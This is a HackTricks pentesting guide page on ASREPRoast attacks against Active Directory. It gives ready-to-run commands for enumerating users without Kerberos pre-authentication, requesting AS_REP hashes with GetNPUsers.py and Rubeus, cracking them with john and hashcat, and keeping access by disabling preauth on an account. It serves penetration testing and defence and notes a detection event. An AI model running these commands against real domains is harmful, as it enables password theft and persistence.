hacktricks/windows-hardening/active-directory-methodology/asreproast.md
carlospolop efa1552937 link
2023-02-27 11:02:29 +01:00

5.6 KiB

ASREPRoast

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥

Follow HackenProof to learn more about web3 bugs

🐞 Read web3 bug tutorials

🔔 Get notified about new bug bounties

💬 Participate in community discussions

ASREPRoast

The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.

Enumerating vulnerable users (need domain credentials)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

Request AS_REP message

{% code title="Using Linux" %}

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

{% endcode %}

{% code title="Using Windows" %}

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

{% endcode %}

{% hint style="warning" %} AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0. {% endhint %}

Cracking

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 

Persistence

Force preauth not required for a user where you have GenericAll permissions (or permissions to write properties):

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

References

More information about AS-RRP Roasting in ired.team

Follow HackenProof to learn more about web3 bugs

🐞 Read web3 bug tutorials

🔔 Get notified about new bug bounties

💬 Participate in community discussions

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥